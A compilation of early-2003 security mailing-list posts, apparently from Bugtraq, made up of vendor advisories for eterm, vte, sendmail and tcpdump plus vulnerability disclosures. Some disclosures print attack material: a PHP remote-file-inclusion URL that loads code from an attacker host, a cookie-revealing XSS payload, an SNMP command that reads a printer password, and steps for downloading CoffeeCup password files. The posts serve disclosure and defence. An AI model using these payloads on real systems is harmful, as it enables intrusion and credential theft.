GLSA: eterm (200303-1)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - GENTOO LINUX SECURITY ANNOUNCEMENT 200303-1 - - - PACKAGE : eterm SUMMARY : dangerous interception of escape sequences DATE : 2003-03-03 10:13 UTC EXPLOIT : remote VERSIONS AFFECTED : 0.9.2 FIXED VERSION : 0.9.2 CVE : CAN-2003-0021 CAN-2003-0068 - - - - From advisory: Many of the features supported by popular terminal emulator software can be abused when un-trusted data is displayed on the screen. The impact of this abuse can range from annoying screen garbage to a complete system compromise. All of the issues below are actually documented features, anyone who takes the time to read over the man pages or source code could use them to carry out an attack. Read the full advisory at: http://marc.theaimsgroup.com/?l=bugtraqm=104612710031920w=2 SOLUTION It is recommended that all Gentoo Linux users who are running x11-terms/eterm upgrade to eterm-0.9.2-r3 as follows: emerge sync emerge -u eterm emerge clean - - - [EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz - - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+YyrSfT7nyhUpoZMRAmQMAJ9l+LP0d7ZiiU/ORWsHe8dfbizcygCfRRaY 0qutlqN466gl7gkPydYcc6c= =W8wR -END PGP SIGNATURE-
GLSA: vte (200303-2)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - GENTOO LINUX SECURITY ANNOUNCEMENT 200303-2 - - - PACKAGE : vte SUMMARY : dangerous interception of escape sequences DATE : 2003-03-03 10:16 UTC EXPLOIT : remote VERSIONS AFFECTED : 0.10.25 FIXED VERSION : 0.10.25 CVE : CAN-2003-0070 - - - - From advisory: Many of the features supported by popular terminal emulator software can be abused when un-trusted data is displayed on the screen. The impact of this abuse can range from annoying screen garbage to a complete system compromise. All of the issues below are actually documented features, anyone who takes the time to read over the man pages or source code could use them to carry out an attack. Read the full advisory at: http://marc.theaimsgroup.com/?l=bugtraqm=104612710031920w=2 SOLUTION It is recommended that all Gentoo Linux users who are running x11-libs/vte upgrade to vte-0.10.25 as follows: emerge sync emerge -u vte emerge clean - - - [EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz - - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+YytrfT7nyhUpoZMRAmM4AJ9GiRX6v2zDkr0hftZ5hWc0rP8FtwCfWjsM sM4EOkJZrokHlfOWLABLBgo= =+/3p -END PGP SIGNATURE-
Re: Netscape Communicator 4.x sensitive informations in configurationfile
Although keeping the password plaintext in a configuration file isn't the best way to handle a password that software needs to remember, I do however want to point out that in order for programs to remember your password, they *must* store the password in some sort of reverseable obfuscation, meaning that once the obfuscation algorithm is known, the password is no more secure no matter how obfuscated it gets, as the software must at some point in time return it to a plaintext form in order to make use of it. Obfuscating stored passwords only provides a minimal level of additional protection. If you are using a system where someone has access to your configuration files (example: public computer lab in a library or college campus), then do *not* store your password on that machine. If someone has the same access to that machine as you do, consider any information you store on it to be publicly available, and take appropriate precautions for sensitive information. -MightyE Neil Dickey wrote: Marc Ruef [EMAIL PROTECTED] wrote: The following paste shows the IMAP mail part of this configuration file. You can see that the line 17 shows the unencrypted password (MyPassword4). [ ... Snip ... ] user_pref(mail.imap.server.imap.computec.ch.password, MyPassword4); user_pref(mail.imap.server.imap.computec.ch.remember_password, true); I notice from the line immediately following that you have the package remember your password. It's been my understanding that doing so is bad practice because that's just the sort of thing that someone probing your system would very likely be looking for. Certainly if you save your password only in your head, then whether or not the program stores it in the clear is a moot question. ;-) Best regards, Neil Dickey, Ph.D. Research Associate/Sysop Geology Department Northern Illinois University DeKalb, Illinois 60115 smime.p7s Description: S/MIME Cryptographic Signature
Implementation flaws in Adobe Document Server for Reader Extensions
Summary === Free Adobe Acrobat Reader (version 5.1 or later) has ability to: add notes and attachments, add and check digital signatures, save forms locally, fill them out online, distribute to others for review and commenting, and submit forms via e-mail or the Web directly from within Acrobat Reader. But actions listed above available for rights-enabled documents only (i.e. documents processed by Adobe Document Server for Reader Extensions). Improper usage of cryptography in server software allows anyone to produce reader-enabled documents without Document Server for Reader Extensions. Contact information === Name : ElcomSoft Co.Ltd. E-mail : [EMAIL PROTECTED] Fax: +1 866 448-2703 (US/Canada, toll-free) The problem has been reported to vendor (Adobe Systems Inc) on 02/24/2003; vendor has not replied. Technical info === Adobe Document Server for Reader Extensions --- With this server, customers can assign custom usage rights to specific Adobe Portable Document Format (PDF) forms and documents, so Acrobat Reader 5.1 users can get access to additional features while working with the document. The server can enable four types of usage rights on a PDF form: - Commenting tools, including sticky notes, highlights, stamps, and strikethroughs; - The ability to save a form to a desktop for offline completion or archiving, without loosing any forms data; - Digital signatures, including support for Public Key Infrastructure systems for third-party validation (VeriSign, Entrust, and others); - Advanced form features, including the ability to submit a form offline or via email, import or export forms data and attached files. Description of Adobe Document Server for Reader Extensions features is available at http://www.adobe.com/products/server/readerextensions/main.html. The implementation of Document Server for Reader Extensions does not seem to be very complicated. The Server just gets the PDF file (to be reader-enabled) together with the list of enabling options, and produces new document that contains one additional dictionary - actually, simply by adding an additional block of data. Note: for details of PDF structure, see Portable Document Format Specification http://partners.adobe.com/asn/developer/acrosdk/docs/filefmtspecs/PDFReference.pdf New dictionary is named ViewerPreferences and resides within document's Root dictionary. For now, only one element is placed inside ViewerPreferences dictionary - Rights Dictionary. Content of the Rights Dictionary can be described as follows (key name, type and description): Version (number): A number specifying the version of Rights dictionary. Currently only version 1 is supported. Document (array of names): List of flags related to Document operations. Currently only one flag is supported: FullSave. Form (array of names): List of flags related to Form processing. Supported flags: Import, Export, SubmitStandalone, SpawnTemplate. Annots (array of names): List of flags related to Annotations. Supported flags: Create, Delete, Modify, Copy, Import, Export. Signature (array of names): List of flags related to Digital Signature handling. Currently only one flag is supported: Modify. Msg (text string): Arbitrary string to be displayed in Instructions box when reader-enabled document is opened in Acrobat Reader 5.1. TimeOfUbiquitization (date): The date and time when document was processed by Document Server for Reader Extensions. RightsID or ADBE_RightsID (array): List of RSA-based digital signatures for checking integrity of reader-enabling attributes. Most elements listed in the table above are self-descriptive. Name of the last key could be either RightsID or ADBE_RightsID - they are equivalent in Reader 5.1. Values in RightsID (or ADBE_RightsID) array are 512-bit RSA-encrypted values, and could be decrypted with RSA Public Key, which is hard-coded (in encrypted form) within Reader 5.1 executable. Those values are used as digital signatures of some critical document parts to make sure that document was reader-enabled with Adobe Document Server for Reader Extensions. Sample form with additional usage rights could be downloaded from http://www.adobe.com/products/server/readerextensions/pdfs/sample_docserver_readerext.pdf According to press release from October 21, 2002, available at http://www.adobe.com/aboutadobe/pressroom/pressreleases/pdfs/200210/20021021Ubiquity.pdf, pricing of Adobe Document Server for Reader Extensions starts at US$75,000. Adobe Acrobat Reader --- Adobe Acrobat Reader is the most popular part of Adobe Acrobat product family. Acrobat Reader is
New HP Jetdirect SNMP password vulnerability when using Web JetAdmin
Hello, During an analysis of some HP Jetdirect cards I discovered a security issue that could lead to full access to a networked printer. It looks like the vulnerability described in http://www.securityfocus.com/bid/5331, but the OID is different and you can only obtain one specific password. It is also different from the password vulnerability described in http://www.securityfocus.com/bid/3132 It applies to the following situation: - Any operating system -HP Jetdirect cards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A), JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A) and older. -The Jetdirect card is being managed from HP Web Jetadmin. -A Web Jetadmin device password had been set on the JetDirect card. (This password must be set from Web Jetadmin and has nothing to do with the Telnet password or the SNMP Set community name) In the above situation the Web Jetadmin device password is readable as plain ASCII tekst from the JetDirect card using SNMP. How to check your printers for this vulnerability: Use an SNMP toolkit to read the following OID from your printer: .iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net- printer.generalDeviceStatus.gdPasswords (In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0) An example on a Windows machine, using SNMPUTIL from the Windows Resource kit: C:\snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0 Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0 Value= String 0x410x420x430x440x550x560x3d0x310x300x380 x3b0x000x000x000x00 ..etc... The resulting string reads in ASCII: ABCDEF=108; The Web Jetadmin device password is the word before the '=' sign, in this case: ABCDEF How to protect your printer: 1. Keep the Web Jetadmin device password EMPTY (don't do this on newer cards than the ones mentioned above) 2. Define a 'Set community name' instead Additional means of protection (does not address the SNMP vulnerability): 3. Define a telnet password (do not keep it empty) 4. Create an 'allow list' from the Telnet console to restrict access from defined IP-addresses Sven Pechler University of Technology Eindhoven Faculty of Technology Management
Contact for Palm Computing
Does anyone know who is the security contact for Palm Computing (PalmOS)? -- Joel Maslak
GTcatalog (PHP)
Informations : °° Version : 0.9 Website : http://www.geektweaked.com Problem : - Informations Disclosure (Admin Password) - File Including PHP Code/Location : °°° password.inc : ? $globalpw = [PASSWORD]; ? index.php : [...] switch ($function) { case custom: $cc = new Template(); $cc-set_file(head,$dir_base.$dir_template.header.inc); $cc-set_var(array( 'clientcode' = $cfg_clientcode, 'title' = $cfg_title. - .$custom)); $cc-parse(output,head); $cc-p(output); include($custom..custom.inc); include ($dir_base.$dir_template.footer.inc); break; [...] Exploits : °° - http://[target]/password.inc - http://[target]/index.php?function=customcustom=http://[attacker]/1 with : http://[attacker]/1.custom.inc Patch : °°° A patch can be found on http://www.phpsecure.info (- New Version !! :)) More Details : °° In French : http://www.frog-man.org/tutos/GTcatalog.txt [EMAIL PROTECTED] _ MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
Mail Header Buffer Overflow In Sendmail
-BEGIN PGP SIGNED MESSAGE- __ SGI Security Advisory Title: Mail Header Buffer Overflow In Sendmail Number : 20030301-01-P Date : March 3, 2003 Reference: CERT VU#398025 Reference: CERT CA-2003-07 Reference: CVE CAN-2002-1337 Reference: SGI BUG 869098 875386 880975 Fixed in : IRIX 6.5.20 or patches 4975 and 4976 __ - --- - --- Issue Specifics --- - --- ISS and sendmail.org have reported that there is a vulnerability involving mail header manipulation that can result in a remote user gaining root access to a system receiving mail through sendmail. http://www.sendmail.org/8.12.8.html http://www.cert.org/advisories/CA-2003-07.html http://www.kb.cert.org/vuls/id/398025 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1337 SGI has investigated the issue and recommends the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be implemented on ALL vulnerable SGI systems. These issues have been corrected with patches and in future releases of IRIX. - -- - --- Impact --- - -- The sendmail binary is installed by default on IRIX 6.5 systems as part of eoe.sw.base. To determine the version of IRIX you are running, execute the following command: # /bin/uname -R That will return a result similar to the following: # 6.5 6.5.19f The first number (6.5) is the release name, the second (6.5.16f in this case) is the extended release name. The extended release name is the version we refer to throughout this document. - - --- Temporary Workaround --- - At this time, there is no effective workaround (other than disabling sendmail) for these problems. SGI recommends either upgrading to IRIX 6.5.20, or installing the appropriate patch from the listing below. - - --- Solution --- - SGI has provided a series of patches for these vulnerabilities. Our recommendation is to upgrade to IRIX 6.5.20 when available, or install the appropriate patch. OS Version Vulnerable? Patch # Other Actions -- --- --- - IRIX 3.xunknown Note 1 IRIX 4.xunknown Note 1 IRIX 5.xunknown Note 1 IRIX 6.0.x unknown Note 1 IRIX 6.1unknown Note 1 IRIX 6.2unknown Note 1 IRIX 6.3unknown Note 1 IRIX 6.4unknown Note 1 IRIX 6.5 yes Notes 2 3 IRIX 6.5.1yes Notes 2 3 IRIX 6.5.2yes Notes 2 3 IRIX 6.5.3yes Notes 2 3 IRIX 6.5.4yes Notes 2 3 IRIX 6.5.5yes Notes 2 3 IRIX 6.5.6yes Notes 2 3 IRIX 6.5.7yes Notes 2 3 IRIX 6.5.8yes Notes 2 3 IRIX 6.5.9yes Notes 2 3 IRIX 6.5.10 yes Notes 2 3 IRIX 6.5.11 yes Notes 2 3 IRIX 6.5.12 yes Notes 2 3 IRIX 6.5.13 yes Notes 2 3 IRIX 6.5.14 yes Notes 2 3 IRIX 6.5.15 yes 4975Notes 2, 4 5 IRIX 6.5.16 yes 4975Notes 2, 4 5 IRIX 6.5.17 yes 4975Notes 2, 4 5 IRIX 6.5.18 yes 4975Notes 2, 4 5 IRIX 6.5.19 yes 4976Notes 2, 4 6 IRIX 6.5.20no NOTES 1) This version of the IRIX operating has been retired. Upgrade to an actively supported IRIX operating system. See http://support.sgi.com/irix/news/index.html#policy for more information. 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/ 3) Upgrade to IRIX 6.5.20 4) Install the patch 5) This patch also fixes the smrsh issue discussed in SGI Security Bulletin 20030101-01-P. 6) This patch also fixes the relaying issue discussed in SGI Security Bulletin 20030101-01-P. - - --- Acknowledgments - SGI wishes to thank sendmail.org, ISS, CERT, and the users of the Internet Community at large for their assistance in this matter. # Patch File Checksums The actual patch will be a tar file containing
Re: Terminal Emulator Security Issues
Would stripping escape sequences from the window title work? Do you know of any applications that actually use this feature? ...snip... (Incidentally, I was unable to embed any such sequences in the title/icon name in 0.9.2 anyway...but I didn't try for very long, so I may have missed something.) After further investigation, I'd like to point out the following: Eterm has *never* allowed any control characters in its title/icon name sequences. The following bit of code has existed at least since Eterm was first committed to CVS: else if (ch ' ') return; /* control character - exit */ in term.c::process_xterm_seq(), line 1270 or so. So there was never any way to get escape sequences in the title to begin with, meaning that the command cannot be hidden using any character attributes or background/foreground color matching. Furthermore, the title which is printed via the \e[21t sequence is limited to just under 1024 characters, which is not enough to cause the command to scroll off the screen on any but the smallest of terminals. Thus, the following footnote from the original report applies to Eterm as well: [1] Although putty would place the title onto the command-line, we were not able to find a method of hiding the command, since neither the invisible character attribute nor the foreground color could be set. Putty has a relatively low limit to the number of characters that can be placed into the window title, so it is not possible to simply flood the screen with garbage and hope the command rolls past the current view. Having said all that, it would seem that Eterm 0.9.2 is not vulnerable to ANY of the issues mentioned in this report. As such, all distributions shipping older versions of Eterm should be safe after upgrading to 0.9.2. To that end, Eterm source and RPM packages are available for download at http://www.eterm.org/download/ for any vendor/user with 0.9.1 or earlier. Hope that clears everything up. :-) Regards, Michael -- Michael Jennings (a.k.a. KainX) http://www.kainx.org/ [EMAIL PROTECTED] n + 1, Inc., http://www.nplus1.net/ Author, Eterm (www.eterm.org) --- By the time they had diminished from 50 to 8, the other dwarves began to suspect 'Hungry' ...-- Gary Larson, The Far Side
Re: sendmail 8.12.8 available
Claus Assmann [EMAIL PROTECTED] writes: Sendmail, Inc., and the Sendmail Consortium announce the availability of sendmail 8.12.8. It contains a fix for a critical security problem discovered by Mark Dowd of ISS X-Force; we thank ISS X-Force for bringing this problem to our attention. Sendmail urges all users to either upgrade to sendmail 8.12.8 or apply the patch for 8.12 that is part of this announcement. Would people be willing to share filter rules for other MTAs to block offending messages on relays? Thanks, -- Florian Weimer[EMAIL PROTECTED] University of Stuttgart http://CERT.Uni-Stuttgart.DE/people/fw/ RUS-CERT fax +49-711-685-5898
Sendmail buffer overflow vulnerability in AIX.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 IBM SECURITY ADVISORY First Issued: Fri Feb 21 11:00:00 CST 2003 === VULNERABILITY SUMMARY VULNERABILITY: sendmail buffer overflow vulnerability. PLATFORMS: AIX 4.3, 5.1 and 5.2 SOLUTION: Apply the workaround, efix or APARs as described below. THREAT: A remote attacker can exploit a buffer overflow to gain root privileges. CERT VU Number: 398025 CVE Number: n/a === DETAILED INFORMATION I. Description === Sendmail is a MTA (mail transfer agent) that routes mail for local or network delivery. When sendmail receives a message it translates the format of message headers to match the requirements of the destination system. The program determines the destination via the syntax and content of the address field in a message header. A vulnerability that exploits how message headers are parsed has been found. This vulnerability allows a remote attacker to gain root privileges. At this time, there is no known exploit in the wild for this vulnerability. The sendmail daemon runs on all versions of AIX by default. To determine if sendmail is running on your system execute the following: #lssrc -s sendmail If sendmail is running, the following will be displayed: Subsystem GroupPID Status sendmail mail active Where is the pid of the sendmail process on your system. If sendmail is not installed, the system is not vulnerable. II. Impact == A remote attacker can gain root privileges. III. Solutions === A. Official Fix IBM provides the following fixes: APAR number for AIX 4.3.3: IY40500 (available approx. 03/12/2003) APAR number for AIX 5.1.0: IY40501 (available approx. 04/28/2003) APAR number for AIX 5.2.0: IY40502 (available approx. 04/28/2003) NOTE: Fixes will not be provided for versions prior to 4.3 as these are no longer supported by IBM. Affected customers are urged to upgrade to 4.3.3 or 5.1.0 at the latest maintenance level. B. E-fix Temporary fixes for AIX 4.3.3, 5.1.0, and 5.2.0 systems are available. The temporary fixes can be downloaded via ftp from: ftp://aix.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z The efix compressed tarball contains three fixes: one each for AIX 4.3.3, AIX 5.1.0 and AIX 5.2.0. It also includes this Advisory and a README file with installation instructions. Verify you have retrieved this efix intact: - - - There are 3 fix-files in this package for the 4.3.3, 5.1.0, 5.2.0 releases. The checksums below were generated using the sum and md5 commands and are as follows: Filename summd5 = sendmail.433 61331 428013f747e5a447e2dec777e2e840914a9 sendmail.510 34257 10595f282fd2a472c2d75c88c3c652312842 sendmail.520 45494 100788bcb028aab4625abe0257d3537a0813 These sums should match exactly; if they do not, double check the command results and the download site address. If those are OK, contact IBM AIX Security at [EMAIL PROTECTED] and describe the discrepancy. IMPORTANT: Create a mksysb backup of the system and verify it is both bootable, and readable before proceeding. These temporary fixes have not been fully regression tested; thus, IBM does not warrant the fully correct functioning of the efix. Customers install the efix and operate the modified version of AIX at their own risk. Efix Installation Instructions: - - - Detailed installation instructions can be found in the README file supplied in the efix package. These instructions are summarized below. You need to have the following filesets installed. This ensures that the proper versions of co-requisite system files, such as libc.a, are installed: For AIX 4.3.3: bos.net.tcp.client.4.3.3.87 For AIX 5.1.0: bos.net.tcp.client.5.1.0.38 For AIX 5.2.0: bos.net.tcp.client.5.2.0.1 You can determine which fileset is installed by executing the following: # lslpp -L bos.net.tcp.client 1. Create a temporary efix directory and move to that directory. # mkdir /tmp/efix # cd /tmp/efix 2. Move the efix to /tmp/efix, uncompress it and un-tar the resulting tarfile. Move to the fix directory. # cp PATH_TO_ADVISORY /tmp/efix # where PATH_TO_ADVISORY is the fully # qualified path to the efix package. # uncompress sendmail_efix.tar.Z # tar xvf sendmail_efix.tar # cd sendmail_efix 3. Rename the patched binary files appropriate for your system and set ownership and permissions. # mv sendmail.xxx sendmail # where xxx is 433, 510 or 520 #
sendmail 8.12.8 available
-BEGIN PGP SIGNED MESSAGE- Sendmail, Inc., and the Sendmail Consortium announce the availability of sendmail 8.12.8. It contains a fix for a critical security problem discovered by Mark Dowd of ISS X-Force; we thank ISS X-Force for bringing this problem to our attention. Sendmail urges all users to either upgrade to sendmail 8.12.8 or apply the patch for 8.12 that is part of this announcement. Patches for older versions can be downloaded from ftp.sendmail.org, see http://www.sendmail.org/ for details. Remember to check the PGP signatures of patches or releases obtained. For those not running the open source version, check with your vendor for a patch. There is a bug fix for ident parsing in 8.12.8. While this is not believed to be exploitable, if you are not upgrading to 8.12.8, you may want to turn off ident checking by adding this to your .mc file: define(`confTO_IDENT', `0s') For a complete list of changes see the release notes down below. Please send bug reports to [EMAIL PROTECTED] as usual. Note: We have changed the way we digitally sign the source code distributions to simplify verification: in contrast to earlier versions two .sig files are provided, one each for the gzip'ed version and the compressed version. That is, instead of signing the tar file, we sign the compressed/gzip'ed files, so you do not need to uncompress the file before checking the signature. This version can be found at ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz.sig ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.Z ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.Z.sig and the usual mirror sites. MD5 signatures: 71b4ce8276536b82d4acdf6ec8be306a sendmail.8.12.8.tar.gz 2ecf7890c2ff5035aed8d342473d85a5 sendmail.8.12.8.tar.gz.sig b06953b5fd11f9cd63b1eb89625ad881 sendmail.8.12.8.tar.Z b505fc5b36fbba5b3af2afecb4d587b3 sendmail.8.12.8.tar.Z.sig You either need the first two files or the third and fourth, i.e., the gzip'ed version or the compressed version and the corresponding .sig file. The PGP signature was created using the Sendmail Signing Key/2003, available on the web site (http://www.sendmail.org/) or on the public key servers. Since sendmail 8.11 and later includes hooks to cryptography, the following information from OpenSSL applies to sendmail as well. PLEASE REMEMBER THAT EXPORT/IMPORT AND/OR USE OF STRONG CRYPTOGRAPHY SOFTWARE, PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR EVEN SOURCE PATCHES TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE ATTENTION TO ANY EXPORT/IMPORT AND/OR USE LAWS WHICH APPLY TO YOU. THE AUTHORS ARE NOT LIABLE FOR ANY VIOLATIONS YOU MAKE HERE. SO BE CAREFUL, IT IS YOUR RESPONSIBILITY. SENDMAIL RELEASE NOTES $Id: RELEASE_NOTES,v 8.1340.2.113 2003/02/11 19:17:41 gshapiro Exp $ This listing shows the version of the sendmail binary, the version of the sendmail configuration files, the date of release, and a summary of the changes in that release. 8.12.8/8.12.8 2003/02/11 SECURITY: Fix a remote buffer overflow in header parsing by dropping sender and recipient header comments if the comments are too long. Problem noted by Mark Dowd of ISS X-Force. Fix a potential non-exploitable buffer overflow in parsing the .cf queue settings and potential buffer underflow in parsing ident responses. Problem noted by Yichen Xie of Stanford University Compilation Group. Fix ETRN #queuegroup command: actually start a queue run for the selected queue group. Problem noted by Jos Vos. If MaxMimeHeaderLength is set and a malformed MIME header is fixed, log the fixup as Fixed MIME header instead of Truncated MIME header. Problem noted by Ian J Hart. CONFIG: Fix regression bug in proto.m4 that caused a bogus error message: FEATURE() should be before MAILER(). MAIL.LOCAL: Be more explicit in some error cases, i.e., whether a mailbox has more than one link or whether it is not a regular file. Patch from John Beck of Sun Microsystems. Instructions to extract and apply patch for sendmail 8.12: The data below is a uuencoded, gzip'ed tar file. Store the data between = begin patch and = end patch == into a file called patch.sm and apply the following command: uudecode -p patch.sm | gunzip -c | tar -xf - This will give you two files: sendmail.8.12.security.cr.patch sendmail.8.12.security.cr.patch.sig Check the integrity of the patch file using
Cobalt RaQ server appliances
Hi, does anybody know a security contact at Sun, especially for the Cobalt RaQ server appliances? Thanks, Florian
RE: Terminal Emulator Security Issues
After further investigation, I'd like to point out the following: Eterm has *never* allowed any control characters in its title/icon name sequences. The following bit of code has existed at least since Eterm was first committed to CVS: else if (ch ' ') return; /* control character - exit */ in term.c::process_xterm_seq(), line 1270 or so. So there was never any way to get escape sequences in the title to begin with, meaning that the command cannot be hidden using any character attributes or background/foreground color matching. What about the CSI character, code 155 (128+27), which DEC terminals (from at least vt220) interpret as a shorthand for ESC [? http://vt100.net/docs/vt220-rm/chapter2.html#S2.5.2 Later, Kenn
Re: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions
The Java version is also vulnerable. The username, password and secret url can be extracted from the param 0 in the html code. I wrote a small program for this purpose a couple of months ago. Password Wizard java sample: http://www.coffeecup.com/java-password/samples/ applet code=joylock.class width=342 height=140 param name=GENERATOR value=CREATED WITH THE APPLET PASSWORD WIZARD WWW.COFFEECUP.COM param name=GENERAL value=1|11|004080|FF|wslzebajkcnrvogpquftxhidmyvttp://aaa.jnsseejrp.jny /ywxxce.vtyc| |Login Complete.|Enter the Username and Password.| | | param name=0 value=6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe /enyyvw.zcev /applet Best regards, Per-Ola Kristiansson - Original Message - From: Rynho Zeros Web [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Saturday, March 01, 2003 12:42 AM Subject: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions + Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions + Product: CoffeeCup Password Wizard All Versions + Vendor: CoffeeCup Software, Inc. + Site: http://www.coffeecup.com/java-password/ + About CoffeeCup Password Wizard: Create unlimited password protected pages with unlimited usernames and passwords with CoffeeCup Password Wizard. You don't even have to know Flash, Java, or HTML ! Customize the look and feel to match your page. You can even point different users to different URLs ! Preview within the program or your favorite browser. It's all that easy ! All this and more make CoffeeCup Password Wizard the easiest way to password protect your pages ! (¿?) + Description: Easy obtaining of names of users, passwords and a URL of direct access to the preferences of the same one. + Exploit: go to the login panel, see sourcecode HTML in search of the location of the file .swf used to make login. Example: Go to https://www.victim.com/billing/ See sourcecode, [...] ID=billing WIDTH=146 HEIGHT=125 PARAM NAME=movie VALUE=billing.swf PARAM NAME=quality VALUE=high [...] (https://www.victim.com/billing/billing.swf) the file of the passwords is called just as the file of login, but with the extension .apw now, go to download the file: https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password Wizard File) by I complete it opens east file with any text editor and found all the users with its passwords and the URL of direct access to its options. Example of passwords file: - billing.apw --- COFFEECUP PASSWORD WIZARD FILE WWW.COFFEECUP.COM PLEASE DO NOT EDIT MOVIE WIDTH:120 MOVIE HEIGHT:100 MOVIE FRAME RATE:0 MOVIE BK COLOR:$00ECECEC MOVIE DEFAULT URL: MOVIE DEFAULT FRAME: MOVIE SWF NAME:billing.swf MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis Webs\victim.com\new website project\billing\ MOVIE FONT NAME:MS Sans Serif MOVIE FONT SIZE:8 MOVIE FONT COLOR:clBlack MOVIE TRANSPARENT TRUE MOVIE VERTICAL TRUE USER BOX LEFT:2 USER BOX TOP:1 USER BOX WIDTH:116 USER BOX HEIGHT:34 USER BOX CAPTION:Username PASS BOX LEFT:2 PASS BOX TOP:36 PASS BOX WIDTH:116 PASS BOX HEIGHT:34 PASS BOX CAPTION:Password BUTTON LEFT:15 BUTTON TOP:78 BUTTON WIDTH:90 BUTTON HEIGHT:20 BUTTON PATH: BUTTON TX:1 BUTTON TY:1 ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm [...] END - billing.apw --- Example of user pass on billing: user: anyweb pass: xnet0305 url option panel: https://www.victim.com/billing/anyweb0001.htm [EOF] --- Credits: ToOcOoL (http://www.valenciahack.com/) --- Note: sorry by my bad english ;) -- XyBØrG WebMaster de: www.RZWEB.com.ar Powered By Dattatec.Com +++ GMX - Mail, Messaging more http://www.gmx.net +++ Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage! passwiz.c Description: Binary data
[SCSA-008] Cross Site Scripting Script Injection Vulnerability in PY-Livredor
Security Corporation Security Advisory [SCSA-008] PROGRAM: PY-Livredor HOMEPAGE: http://www.py-scripts.com http://www.scripts-php.com VULNERABLE VERSIONS: v1.0 DESCRIPTION PY-Livredor is an easy guestbook script using Php4 and MySql with an administration which allow messages deletion. DETAILS A Cross-Site Scripting vulnerability have been found in PY-Livredor which allow attackers to inject script codes into the guestbook and use them on clients browser as if they were provided by the website. This Cross-Site Scripting vulnerability are found in the page for posting messages (index.php) An attacker can input specially crafted links and/or other malicious scripts. EXPLOIT A vulnerability was discovered in the page for posting messages, at this adress : http://[target]/livredor/index.php The vulnerability is at the level of the interpretation of the titre, Votre pseudo, Votre e-mail, Votre message fields. Indeed, the insertion of a hostile code script in this field makes it possible to a malicious user to carry out this script on the navigator of the visitors. The hostile code could be : [script]alert(Cookie=+document.cookie)[/script] (open a window with the cookie of the visitor.) (replace [] by ) SOLUTIONS No solution for the moment. VENDOR STATUS The vendor has reportedly been notified. LINKS http://www.security-corp.org/index.php?ink=4-15-1 Version Française : http://www.security-corp.org/advisories/SCSA-008-FR.txt Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
MDKSA-2003:027 - Updated tcpdump packages fix denial of service vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: tcpdump Advisory ID:MDKSA-2003:027 Date: March 3rd, 2003 Affected versions: 8.1, 8.2, 9.0, Corporate Server 2.1, Multi Network Firewall 8.2, Single Network Firewall 7.2 Problem Description: A vulnerability was discovered by Andrew Griffiths and iDEFENSE Labs in the tcpdump program. By sending a specially crafted network packet, an attacker is able to to cause tcpdump to enter an infinite loop. In addition, the tcpdump developers found a potential infinite loop when tcpdump parses malformed BGP packets. A buffer overflow was also discovered that can be exploited with certain malformed NFS packets. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0108 Updated Packages: Corporate Server 2.1: 9df719dae2bffe49798156e87e875301 corporate/2.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm fa7813f3afb1df4b3c00b73a198a53db corporate/2.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm b32457602c61c0febcfc2e511373b517 corporate/2.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm 2a5ba8809cc1b919e14eda315a6340b7 corporate/2.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm 5129421a6ff6b84a4e4faae0119cfb23 corporate/2.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm Mandrake Linux 8.1: 785f18da90ecf009c38d8e9e01216756 8.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm 512599ad54b47f70f54d722e7618ac45 8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm 01ab2770370dd94c1946b476df624fb7 